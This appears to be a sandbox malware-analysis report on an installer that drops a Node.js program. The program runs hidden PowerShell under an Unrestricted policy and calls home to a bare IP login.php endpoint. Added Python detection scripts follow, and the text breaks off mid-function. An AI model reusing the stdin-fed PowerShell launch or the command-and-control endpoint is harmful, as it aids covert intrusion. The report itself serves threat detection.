File name: Insprock289.exe
Full analysis: https://app.any.run/tasks/c7f65e13-cbab-4630-88e9-5b41ea1742a5
Verdict: Malicious activity
Analysis date: March 14, 2025, 12:50:13
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: nodejs
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive, 5 sections
MD5: 438F0C0D9F12A6D97C0DCE2190832BC0
SHA1: 316794630D95E55385EB806E8544DF718E1EABDA
SHA256: 378FB3F303469B11713DDB68409900EEF42386C0B88FF6BBCB588023174507CC
SSDEEP: 786432:xTOQeCGt28GR7DbkHQarIHtTdQUmdGc/BIhOd:xqQeF28GRPbkHQ9WhdGwBIhG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • Insprock289.exe (PID: 5204)
    • Changes powershell execution policy (Unrestricted)

      • Three.exe (PID: 736)
  • SUSPICIOUS

    • Malware-specific behavior (creating "System.dll" in Temp)

      • Insprock289.exe (PID: 5204)
    • The process creates files with name similar to system file names

      • Insprock289.exe (PID: 5204)
    • Executable content was dropped or overwritten

      • Insprock289.exe (PID: 5204)
    • Drops 7-zip archiver for unpacking

      • Insprock289.exe (PID: 5204)
    • Process drops legitimate windows executable

      • Insprock289.exe (PID: 5204)
    • Reads security settings of Internet Explorer

      • Insprock289.exe (PID: 5204)
    • Starts application with an unusual extension

      • cmd.exe (PID: 4424)
    • Starts CMD.EXE for commands execution

      • Three.exe (PID: 736)
    • Application launched itself

      • Three.exe (PID: 736)
    • The process bypasses the loading of PowerShell profile settings

      • Three.exe (PID: 736)
    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 7496)
    • There is functionality for taking screenshot (YARA)

      • Three.exe (PID: 2340)
      • Insprock289.exe (PID: 5204)
    • Connects to the server without a host name

      • Three.exe (PID: 736)
    • Starts POWERSHELL.EXE for commands execution

      • Three.exe (PID: 736)
    • The process hides Powershell's copyright startup banner

      • Three.exe (PID: 736)
  • INFO

    • The sample compiled with english language support

      • Insprock289.exe (PID: 5204)
    • Checks supported languages

      • Insprock289.exe (PID: 5204)
      • Three.exe (PID: 736)
      • chcp.com (PID: 7052)
      • Three.exe (PID: 3300)
      • Three.exe (PID: 2340)
    • Reads the computer name

      • Insprock289.exe (PID: 5204)
      • Three.exe (PID: 736)
      • Three.exe (PID: 2340)
      • Three.exe (PID: 3300)
    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 2384)
      • BackgroundTransferHost.exe (PID: 736)
      • BackgroundTransferHost.exe (PID: 6112)
      • BackgroundTransferHost.exe (PID: 6800)
      • BackgroundTransferHost.exe (PID: 6640)
    • Create files in a temporary directory

      • Insprock289.exe (PID: 5204)
    • Checks proxy server information

      • BackgroundTransferHost.exe (PID: 6640)
      • Three.exe (PID: 736)
      • slui.exe (PID: 6080)
    • Creates files or folders in the user directory

      • BackgroundTransferHost.exe (PID: 6640)
    • Reads the software policy settings

      • BackgroundTransferHost.exe (PID: 6640)
    • Process checks computer location settings

      • Three.exe (PID: 736)
    • Changes the display of characters in the console

      • cmd.exe (PID: 4424)
    • Node.js compiler has been detected

      • Three.exe (PID: 736)
      • Three.exe (PID: 2340)
      • Three.exe (PID: 3300)
    • Reads the machine GUID from the registry

      • Three.exe (PID: 736)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7784)
      • powershell.exe (PID: 8092)
      • powershell.exe (PID: 7704)
      • powershell.exe (PID: 2268)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2018:12:15 22:26:14+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 26624
InitializedDataSize: 473088
UninitializedDataSize: 16384
EntryPoint: 0x338f
OSVersion: 4
ImageVersion: 6
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 0.7.4.0
ProductVersionNumber: 0.7.4.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
CompanyName: Rack
FileDescription: Leave labor wave
FileVersion: 0.7.4
LegalCopyright: Copyright © 2025 Rack
ProductName: Three
ProductVersion: 0.7.4
No data.
All screenshots are available in the full report
Total processes: 185
Monitored processes: 60
Malicious processes: 2
Suspicious processes: 0

Behavior graph

start insprock289.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs three.exe cmd.exe no specs conhost.exe no specs chcp.com no specs three.exe no specs three.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs findstr.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs slui.exe

Process information

Columns: PID, CMD, Path, Indicators, Parent process

PID: 668
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 672
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 736
CMD: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Path: C:\Windows\System32\BackgroundTransferHost.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
PID: 736 (PID 736 appears twice in this report: the BackgroundTransferHost.exe instance above exited with code 1, and the PID was then reused for Three.exe)
CMD: C:\Users\admin\AppData\Local\Temp\2tzicnRZuZfCGIckIZC2YPlrndK\Three.exe
Path: C:\Users\admin\AppData\Local\Temp\2tzicnRZuZfCGIckIZC2YPlrndK\Three.exe
Parent process: Insprock289.exe
User:
admin
Company:
Rack
Integrity Level:
MEDIUM
Description:
Leave labor wave
Exit code:
134
Version:
0.7.4
Modules
Images
c:\users\admin\appdata\local\temp\2tzicnrzuzfcgickizc2yplrndk\three.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\oleaut32.dll
PID: 1012
CMD: C:\WINDOWS\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
Path: C:\Windows\SysWOW64\cmd.exe (the command line names system32, but Three.exe is a 32-bit process, so WOW64 file-system redirection resolves it to SysWOW64; the same applies to the powershell.exe children below)
Parent process: Three.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 1280
CMD: C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: Three.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 1568
CMD: C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: Three.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 2140
CMD: C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: Three.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 2240
CMD: C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: Three.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 2268
CMD: C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: Three.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
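Every powershell.exe row above carries the same command line: -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -. The trailing "-Command -" makes powershell.exe read its script from standard input, so the script body never appears in process-creation telemetry (only PowerShell script-block logging, event 4104, would record it), and the cmd.exe /d /s /c "..." row is the exact switch shape Node.js's child_process.exec() produces on Windows. The Python below is an added example, not part of the ANY.RUN report: it runs those checks over process-creation events constructed from the command lines listed above plus one constructed benign control. Its table of powershell.exe parameter abbreviations is an assumption to verify against the PowerShell build you defend.

```python
"""Triage of process-creation events for the launch pattern in this report.

Added example, not part of the ANY.RUN report. SAMPLE_EVENTS is constructed from
the command lines in the report (plus one constructed benign control); it is not
an exported log.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # path of the new process as recorded by the sensor
    cmdline: str        # command line as logged (may say system32 under WOW64)
    parent_image: str   # path of the parent process


# powershell.exe accepts any unambiguous prefix of a parameter (-nop, -ex, -c ...)
# and the alias -ep. Assumed minimum-prefix table: verify against your build.
_PS_MIN_PREFIX = {
    "executionpolicy": "ex",
    "command": "c",
    "encodedcommand": "e",
    "noprofile": "nop",
    "nologo": "nol",
    "noexit": "noe",
}
_PS_ALIASES = {"ep": "executionpolicy", "ec": "encodedcommand"}
_TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted spans intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def canonical_switch(token: str) -> Optional[str]:
    """Map -NoP, -ExecutionPolicy, -ep, /c ... to a canonical powershell.exe parameter."""
    if len(token) < 2 or token[0] not in "-/":
        return None
    key = token[1:].lower()
    if key in _PS_ALIASES:
        return _PS_ALIASES[key]
    for full, minimum in _PS_MIN_PREFIX.items():
        if full.startswith(key) and len(key) >= len(minimum):
            return full
    return None


def analyze_powershell(ev: ProcEvent) -> List[str]:
    tokens = tokenize(ev.cmdline)
    findings: List[str] = []
    i = 1                                   # tokens[0] is the image path
    while i < len(tokens):
        name = canonical_switch(tokens[i])
        if name == "executionpolicy" and i + 1 < len(tokens):
            policy = tokens[i + 1].lower()
            if policy in ("unrestricted", "bypass"):
                findings.append(f"execution_policy_{policy}")
            i += 1
        elif name == "command":
            # "-Command -" reads the script from stdin: the body never reaches
            # process-creation telemetry, only script-block logging (4104) has it.
            if i + 1 < len(tokens) and tokens[i + 1] == "-":
                findings.append("script_over_stdin")
            break                           # -Command consumes the rest of the line
        elif name == "encodedcommand":
            findings.append("encoded_command")
            break
        i += 1
    if _TEMP_DIR.search(ev.parent_image):
        findings.append("powershell_child_of_temp_binary")
    return findings


def analyze_cmd(ev: ProcEvent) -> List[str]:
    tokens = tokenize(ev.cmdline)
    lowered = [t.lower() for t in tokens]
    findings: List[str] = []
    if lowered[1:4] == ["/d", "/s", "/c"]:
        # exact switch shape Node.js child_process.exec() uses on Windows
        findings.append("node_child_process_exec_shape")
    if "/c" in lowered:
        payload = " ".join(tokens[lowered.index("/c") + 1:]).upper()
        if "%COMPUTERNAME%" in payload and "%USERDNSDOMAIN%" in payload:
            findings.append("host_fingerprint_probe")
    return findings


def triage(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Return {pid: findings} for every event that trips at least one check."""
    out: Dict[int, List[str]] = {}
    for ev in events:
        base = ev.image.rsplit("\\", 1)[-1].lower()
        if base == "powershell.exe":
            findings = analyze_powershell(ev)
        elif base == "cmd.exe":
            findings = analyze_cmd(ev)
        else:
            findings = []
        if findings:
            out[ev.pid] = findings
    return out


THREE = r"C:\Users\admin\AppData\Local\Temp\2tzicnRZuZfCGIckIZC2YPlrndK\Three.exe"
SAMPLE_EVENTS = [
    ProcEvent(1012, r"C:\Windows\SysWOW64\cmd.exe",
              r'C:\WINDOWS\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"', THREE),
    ProcEvent(1280, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo "
              r"-InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -", THREE),
    # constructed benign control: an admin script started from Explorer
    ProcEvent(4242, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -NoProfile -File "C:\Scripts\backup.ps1"', r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, findings in sorted(triage(SAMPLE_EVENTS).items()):
        print(pid, ", ".join(findings))
```

The parent-in-Temp check is what separates this from routine administration: the same PowerShell flags launched by explorer.exe produce no finding, while the stdin-fed script under an Unrestricted policy from a binary in %TEMP% produces three.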
Total events: 106 349
Read events: 106 334
Write events: 15
Delete events: 0

Modification events

(PID) Process: (2384) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation: write
Name: CachePrefix
Value: (empty string)

(PID) Process: (2384) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (2384) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (6640) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation: write
Name: CachePrefix
Value: (empty string)

(PID) Process: (6640) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (6640) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (736) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation: write
Name: CachePrefix
Value: (empty string)

(PID) Process: (736) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (736) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (6112) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation: write
Name: CachePrefix
Value: (empty string)
Executable files: 17
Suspicious files: 128
Text files: 68
Unknown types: 0

Dropped files

Columns: PID, Process, Filename, Type, MD5, SHA256 (hashes and type are blank where the export did not record them)

PID: 5204
Process: Insprock289.exe
Filename: C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\app-32.7z
Type:
MD5:
SHA256:

PID: 5204
Process: Insprock289.exe
Filename: C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\icudtl.dat
Type:
MD5:
SHA256:

PID: 5204
Process: Insprock289.exe
Filename: C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\LICENSES.chromium.html
Type:
MD5:
SHA256:

PID: 5204
Process: Insprock289.exe
Filename: C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\nsis7z.dll
Type: executable
MD5: 80E44CE4895304C6A3A831310FBF8CD0
SHA256: B393F05E8FF919EF071181050E1873C9A776E1A0AE8329AEFFF7007D0CADF592

PID: 5204
Process: Insprock289.exe
Filename: C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\locales\am.pak
Type: binary
MD5: 4CB768DDAB29DC30E3E0676E9FE403DC
SHA256: EEF0AE38C894B68003537E399C47AEA82E99586A43791C3EB53A8A4957564E8E

PID: 5204
Process: Insprock289.exe
Filename: C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\chrome_100_percent.pak
Type: binary
MD5: 001AA2A7D5DCAF2D0987804A37E21DB9
SHA256: 0B84B7680630DD51CB36A2FCDD7CC3B031636FE6B91F81772822BE9E514132FE

PID: 5204
Process: Insprock289.exe
Filename: C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\chrome_200_percent.pak
Type: binary
MD5: 749E5FF4A826E7FFE8421634520B7E61
SHA256: 8E2AFD2AD5BD4F4EDFE739AD503FF6896410D097665D40E99C56C440A8EBC36E

PID: 5204
Process: Insprock289.exe
Filename: C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\System.dll
Type: executable
MD5: 0D7AD4F45DC6F5AA87F606D0331C6901
SHA256: 3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA

PID: 5204
Process: Insprock289.exe
Filename: C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\locales\bn.pak
Type: binary
MD5: 0BB8E336602F7E8A70F6EB3EAA7931A6
SHA256: C951C3C7E565C6ECA836DD815FF92F92BC9931C400A56EE4C45E4DBCED547153

PID: 5204
Process: Insprock289.exe
Filename: C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\locales\af.pak
Type: binary
MD5: 734923E7E3B505564F4A2D01AD1CFED9
SHA256: 8E6AF9FA4332E027ED629EBCAC60630294E23738706FF35E77432A8CA1304F50
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 8
TCP/UDP connections: 31
DNS requests: 16
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
(the Type and Size columns are empty for every row in this export; a PID shown as "(not listed)" was grouped with the row above it)

5496 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.183:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
2104 | svchost.exe | GET | 200 | 23.48.23.183:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
6640 | BackgroundTransferHost.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | whitelisted
(not listed) | (not listed) | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
4740 | backgroundTaskHost.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | whitelisted
6228 | SIHClient.exe | GET | 200 | 23.222.82.102:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
6228 | SIHClient.exe | GET | 200 | 23.222.82.102:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted
736 | Three.exe | GET | 200 | 217.197.107.91:80 | http://217.197.107.91/login.php?event=init&id=dGVzdA==&data=&data=… (remainder of the query string truncated in this export) | unknown | unknown
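The only request in this table that is not whitelisted is Three.exe's GET to a bare IP address over cleartext HTTP, which is what the "Connects to the server without a host name" indicator refers to; the id value dGVzdA== is base64 for "test". The Python below is an added example, not part of the ANY.RUN report: it applies the checks an analyst runs on such a row (IP-literal host, cleartext transport to that host, repeated and empty query keys, base64-looking values that decode to text) to rows copied from this table. The Three.exe URL is the visible prefix only; the truncated part of its query string is not reconstructed.

```python
"""Checks for the HTTP request rows in this report.

Added example, not part of the ANY.RUN report. SAMPLE_REQUESTS copies rows from
the table above; the Three.exe URL is the visible prefix only (the rest of the
query string was truncated in the export and is not reconstructed here).
"""
import base64
import binascii
import ipaddress
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

SAMPLE_REQUESTS: List[Tuple[int, str, str, str]] = [
    (5496, "MoUsoCoreWorker.exe", "GET",
     "http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl"),
    (6640, "BackgroundTransferHost.exe", "GET",
     "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQU"
     "s9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D"),
    (736, "Three.exe", "GET",
     "http://217.197.107.91/login.php?event=init&id=dGVzdA==&data=&data="),
]


def is_ip_literal(host: str) -> bool:
    """True when the host is an IPv4/IPv6 address rather than a name (no DNS, no SNI)."""
    try:
        ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return False
    return True


def decode_if_text_base64(value: str) -> Optional[str]:
    """Decode value if it is well-formed base64 for printable UTF-8 text, else None.

    Short plain words such as "init" pass base64 validation by accident, so the
    UTF-8 and printability checks are what stop this firing on every parameter.
    """
    if not value or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text and text.isprintable() else None


def triage_request(pid: int, process: str, method: str, url: str) -> Dict[str, object]:
    """Apply the analyst checks to one request row; return reasons and decoded values."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    reasons: List[str] = []
    if is_ip_literal(host):
        reasons.append("ip_literal_host")
        if parts.scheme == "http":
            # CRL/OCSP fetches are legitimately cleartext, so http on its own is
            # not a reason; cleartext to a bare IP is.
            reasons.append("cleartext_to_ip_literal")
    counts: Dict[str, int] = {}
    decoded: Dict[str, str] = {}
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        counts[key] = counts.get(key, 0) + 1
        if value == "" and f"empty_query_value:{key}" not in reasons:
            reasons.append(f"empty_query_value:{key}")
        text = decode_if_text_base64(value)
        if text is not None:
            decoded[key] = text
    reasons.extend(f"repeated_query_key:{k}" for k, n in counts.items() if n > 1)
    return {"pid": pid, "process": process, "method": method, "host": host,
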